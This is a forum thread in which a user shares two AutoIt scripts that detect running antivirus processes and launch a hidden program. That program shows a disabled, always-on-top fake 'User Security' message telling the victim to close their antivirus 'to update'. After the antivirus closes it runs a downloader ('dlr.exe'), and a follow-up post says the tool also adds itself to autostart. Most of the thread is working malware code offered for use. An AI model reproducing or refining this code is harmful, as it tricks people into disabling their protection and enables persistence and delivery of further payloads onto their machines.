1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Possible new method of killing antivirus

Discussion in 'Programming' started by blockbowl, Aug 18, 2010.

  1. blockbowl

    blockbowl New Member

    Joined:
    Aug 18, 2010
    Messages:
    2
    Likes Received:
    1
    Trophy Points:
    0
    this is an autoit script designed to nag a user into killing their antivirus.
    it brings up a disabled messagebox window if an antivirus is found in processlist.
    telling the user to update by closing their av. and now the code:
    Code:
    #NoTrayIcon
    If @UserProfileDir Then
        Global $dir = "c:\users\public\"
        DirCreate("c:\users\public\")
    Else
        Global $dir = "c:\"
    EndIf
    $list = ProcessList()
    for $i = 1 to $list[0][0]
      Global $name = $list[$i][0]
      If IniRead("av.ini", "av", $name, 0) = 1 Then
          Send("#{r}")
        WinWait("Run", "")
        WinSetState("Run", "", @SW_HIDE)
        Controlsend("Run", "", "Edit1", $dir & "nagger.exe{ENTER}")
        Send("#{r}")
        WinWait("Run", "")
        WinSetState("Run", "", @SW_HIDE)
        Controlsend("Run", "", "Edit1", $dir & "nagger.exe{ENTER}")
        WinWait("User Security", "")
        WinClose("User Security", "")
      EndIf
    next
    -------------------------- this goes through a process list ini file for a corresponing av is found, if found it runs the following exe:
    #NoTrayIcon
    If @UserProfileDir Then
        Global $dir = "c:\users\public\"
    Else
        Global $dir = "c:\"
    EndIf
    while 1
    If ProcessExists(IniRead("nagger.ini", "nag", "nag", "nag")) AND WinExists("User Security", "") = 0 Then
    MsgBox(0, "User Security", "--------------------------close your antivirus to update-------------------------------")
    WinWait("User Security", "")
    WinSetState("User Security", "", @SW_DISABLE)
    WinSetOnTop("User Security", "", 1)
    Else
    If WinExists("User Security", "") AND ProcessExists(IniRead($dir & "nagger.ini", "nag", "nag", "nag")) = 0 Then
        WinClose("User Security", "")
        Send("#{r}")
        WinWait("Run", "")
        WinSetState("Run", "", @SW_HIDE)
        Controlsend("Run", "", "Edit1", $dir & "dlr.exe{ENTER}")
    EndIf
    Endif
    WinActivate("User Security", "")
    WinFlash("User Security", "", 4, 500)
    sleep(4000)
    WEnd
     
    Last edited by a moderator: Aug 18, 2010
  2. blockbowl

    blockbowl New Member

    Joined:
    Aug 18, 2010
    Messages:
    2
    Likes Received:
    1
    Trophy Points:
    0
    also it adds itself to autostart, once the av is out of the process list, the secondary exe is downloaded
     
    shabbir likes this.

Share This Page